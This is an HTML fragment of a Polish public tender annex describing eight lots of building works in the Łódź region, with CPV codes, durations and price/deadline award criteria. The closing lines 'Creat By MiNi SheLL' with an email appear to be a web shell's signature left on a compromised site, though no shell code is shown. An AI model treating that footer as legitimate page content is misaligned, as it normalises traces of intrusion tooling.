<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty konserwacyjne tynków zewnętrznych z malowaniem elewacji budynku nr 82 w Leźnicy Wielkiej (zadanie nr 1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Roboty konserwacyjne tynków zewnętrznych z malowaniem elewacji budynku nr 82 w Leźnicy Wielkiej (zadanie nr 1)
2.Szczegółowy opis przedmiotu zamówienia określa :
Dla Zadania nr 1 budynek nr 82 w Leźnicy Wielkiej                                     załącznik nr 9  do SIWZ  przedmiar robót  i specyfikacja techniczna 
3.Lokalizacja obiektu
Zadanie nr 1 budynek nr  82 w Leźnicy Wielkiej
95-043 Leźnica Wielka gm. Parzęczew.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.54.00-3, 45.44.21.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 55.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa chodników  w Łodzi  (zadanie  nr 2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Naprawa chodników  w Łodzi  
2.Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 2 chodniki  w Łodzi                                                                     załącznik nr 10  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu
Zadanie nr 2 chodniki w Łodzi
ul.1-go Maja 90  , 90-766 Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.30.00-5, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana  i montaż stolarki drzwiowej w budynku nr 3   w Łodzi (zadanie nr 3).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wymiana  i montaż stolarki drzwiowej w budynku nr 3 w Łodzi 
2.Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 3 budynek nr 3  w Łodzi                                                     załącznik nr 11  do SIWZ przedmiar robót  i specyfikacja techniczna   
3. Lokalizacja obiektu
Zadanie  nr 3 budynek nr 3 w Łodzi
ul.1-go Maja 90  , 90-766 Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.10.00-4, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 55.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie robót konserwacyjnych malarskich z naprawą tynków zewnętrznych budynków nr 37,35,31,27,41,33  w Tomaszowie Mazowieckim (zadanie nr 4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wykonanie robót konserwacyjnych malarskich z naprawą tynków zewnętrznych budynków nr 37,35,31,27,41,33 w Tomaszowie Mazowieckim 
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 4 budynki nr 37,35,31,27,41,33 w Tomaszowie Mazowieckim               załącznik nr 12  do SIWZ przedmiar robót  i specyfikacja techniczna 
3.Lokalizacja obiektu                               
Zadanie nr 4 budynki nr 37,35,31,27,41,33 w Tomaszowie Mazowieckim 
ul. Piłsudskiego 72 , 97-200 Tomaszów Mazowiecki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wymiana obróbek blacharskich w budynku nr 51 
w Tomaszowie Mazowieckim (zadanie nr 5).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wymiana obróbek blacharskich w budynku nr 51 w Tomaszowie Mazowieckim 
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 5 budynek nr 51 w Tomaszowie Mazowieckim                        załącznik nr 13  do SIWZ przedmiar robót  i specyfikacja techniczna 
3.Lokalizacja obiektu                               
Zadanie nr 5 budynek nr 51 w Tomaszowie Mazowieckim 
ul. Piłsudskiego 72 , 97-200 Tomaszów Mazowiecki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 55.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wymiana bram - wrót garażowych w budynkach           nr 10,11,13,14,16,17 w Kutnie (zadanie nr 6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wymiana bram - wrót garażowych w budynkach nr 10,11,13,14,16,17 w Kutnie 
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 6 budynki  nr  10,11,13,14,16,17 w  Kutnie                              załącznik nr 14  do SIWZ przedmiar robót  i specyfikacja techniczna          
3. Lokalizacja obiektu
Zadanie nr 6  budynki nr  10,11,13,14,16,17 w Kutnie
99-300 Skład  Kutno ul. Bohaterów Walk nad Bzurą.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 44.22.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Remont budynku nr 102  w Regnach  (zadanie nr 7).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Remont budynku nr 102  w Regnach  
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 7 budynek nr 102 w Regnach                                                 załącznik nr 15  do SIWZ przedmiar robót  i specyfikacja techniczna     
3. Lokalizacja obiektu
Zadanie nr 7 budynek nr 102 w Regnach 
95-045 Regny gm. Koluszki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.11.00.00-1, 45.43.21.12-2, 45.44.20.00-7, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Remont ogrodzenia zewnętrznego w Zgierzu                ( zadanie nr 8 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Remont ogrodzenia zewnętrznego w Zgierzu   
2.Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 8 ogrodzenie w Zgierzu                                                          załącznik nr 16  do SIWZ przedmiar robót  i specyfikacja techniczna                                 
3. Lokalizacja obiektu
Zadanie nr 8  ogrodzenie w Zgierzu 
ul. Konstantynowska 85 , 95-100 Zgierz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.22.32.10-1, 45.26.22.10-6, 45.34.20.00-6, 45.44.21.00-8, 45.31.62.13-1, 77.21.14.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com